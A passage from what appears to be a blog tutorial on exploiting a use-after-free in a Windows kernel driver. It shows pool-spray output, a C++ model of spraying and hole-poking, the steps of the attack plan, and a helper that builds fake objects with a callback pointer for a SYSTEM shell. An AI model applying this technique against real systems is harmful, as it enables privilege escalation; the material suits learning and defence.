 8543bb20 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bb80 size:   60 previous size:   60  (Free)       IoCo
 8543bbe0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bc40 size:   60 previous size:   60  (Free)       IoCo
 8543bca0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bd00 size:   60 previous size:   60  (Free)       IoCo
 8543bd60 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bdc0 size:   60 previous size:   60  (Free)       IoCo
 8543be20 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543be80 size:   60 previous size:   60  (Free)       IoCo
 8543bee0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bf40 size:   60 previous size:   60  (Free)       IoCo
 8543bfa0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
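The alternating Allocated/Free pattern in the !pool output above can be modeled in a few lines. This is a simplified sketch under the assumption that the sequential spray really did land in adjacent slots; the function names are hypothetical and nothing here touches the real pool.

```cpp
#include <cassert>
#include <cstddef>
#include <vector>

// Model the sequential spray as a row of slots (true = still allocated),
// then free every other one starting at index 0, like the CloseHandle loop.
std::vector<bool> spray_and_poke(std::size_t count) {
    std::vector<bool> allocated(count, true);
    for (std::size_t i = 0; i < count; i += 2) {
        allocated[i] = false;  // poke a hole
    }
    return allocated;
}

// Count how many holes the poking step produced.
std::size_t count_holes(const std::vector<bool>& allocated) {
    std::size_t holes = 0;
    for (bool in_use : allocated) {
        if (!in_use) ++holes;
    }
    return holes;
}

// Check that every hole has allocated objects on each side that exists,
// so a freed chunk can never merge with a neighbouring free chunk.
bool holes_are_fenced(const std::vector<bool>& allocated) {
    for (std::size_t i = 0; i < allocated.size(); ++i) {
        if (allocated[i]) continue;
        if (i > 0 && !allocated[i - 1]) return false;
        if (i + 1 < allocated.size() && !allocated[i + 1]) return false;
    }
    return true;
}
```

For the 30,000 object spray used here, count_holes(spray_and_poke(30000)) is 15000, and holes_are_fenced confirms that no two holes are adjacent. That isolation is what keeps each hole at exactly 0x60 bytes instead of coalescing into a larger free chunk.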

Executing Plan

Now that we’ve confirmed our heap spray works, the next step is to implement our game-plan. We want to:

spray the heap to get it like so ^^,
allocate our UAF object,
free our UAF object,
create our fake objects with malicious callback function pointers,
activate the callback function.

All we really need to do now is allocate the shellcode, get a pointer to it, and place that pointer at the start of the input buffer we use to create our fake objects. We then spray those fake objects into the holes we poked, so around 15,000 of them.
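As a rough sketch of what that input buffer looks like, the helper below lays out a 0x58 byte fake object with a 32 bit callback address in its first DWORD and A characters everywhere else. build_fake_object is a hypothetical name, the address is just a parameter, and allocating shellcode or talking to the driver is deliberately left out; the complete exploit linked below is the author's actual implementation.

```cpp
#include <array>
#include <cassert>
#include <cstddef>
#include <cstdint>

constexpr std::size_t kFakeObjectSize = 0x58;  // same size as the real UAF object

// Hypothetical helper: fill the buffer with 'A' (0x41) and overwrite the first
// DWORD with the callback address, stored little-endian as on x86.
std::array<std::uint8_t, kFakeObjectSize> build_fake_object(std::uint32_t callback_address) {
    std::array<std::uint8_t, kFakeObjectSize> buffer;
    buffer.fill(0x41);
    for (std::size_t i = 0; i < sizeof(callback_address); ++i) {
        buffer[i] = static_cast<std::uint8_t>((callback_address >> (8 * i)) & 0xFF);
    }
    return buffer;
}
```

The resulting bytes are what would be passed as the input buffer to FAKE_OBJECT_IOCTL, once per hole. Writing the address byte by byte keeps the layout explicit and independent of the host's endianness.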

When we run our final code, we get our system shell!

Complete exploit code.

Conclusion

That was a pretty exaggerated exploit scenario I would guess, but it was perfect for me since I had never done a UAF exploit before. Next we’ll be doing the stack overflow again but this time on Windows 10 where we’ll have to bypass SMEP. Until next time.

Once again, big thanks to all the content producers out there for getting me through these exploits.
